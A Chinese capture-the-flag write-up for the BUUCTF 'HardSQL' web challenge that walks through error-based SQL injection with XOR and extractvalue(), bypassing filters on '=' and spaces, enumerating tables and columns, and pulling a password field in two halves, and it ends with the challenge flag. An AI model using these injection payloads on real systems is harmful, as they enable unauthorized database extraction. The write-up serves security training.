数据库
首页 > 数据库> > Buuctf-web-[极客大挑战 2019]HardSQL

Buuctf-web-[极客大挑战 2019]HardSQL

作者:互联网

 

 被堵

 

 

异或运算符为^ 或者 xor
两个同为真的条件做异或,结果为假,两个同为假的条件做异或,结果为假,一个条件为真,一个条件为假,结果为真,null与任何条件(真、假、null)做异或,结果都为null

我们还需要用到一个函数:extractvalue()

对XML文档进行查询的函数

还有要注意的地方是,它能够查询的字符串长度最大是32个字符,如果超过32位,我们就需要用函数来查询,比如right(),left(),substr()来截取字符串

 

然后,我们开始注入

第一个payload:

?username=admin&password=1'^extractvalue(1,concat(0x5c,(select(database()))))%23

 

 库名出来了,接着爆表

发现等于号被过滤,可以用like代替

?username=admin&password=1'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

 

 接着爆字段

?username=admin&password=1'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

 

因为用extractvalue()函数,一次只能显示32个字符,我们需要用 left right函数

?username=admin&password=1'^extractvalue(1,concat(0x5c,(select(left(password,30))from(geek.H4rDsq1))))%23

 

 

 

?username=admin&password=1'^extractvalue(1,concat(0x5c,(select(right(password,30))from(geek.H4rDsq1))))%23

 

flag{68e2d23a-f3b9-46b5-8298-d0470eca0517}

标签:0x5c,web,Buuctf,extractvalue,23,HardSQL,select,password,concat
来源: https://www.cnblogs.com/tac2664/p/14306842.html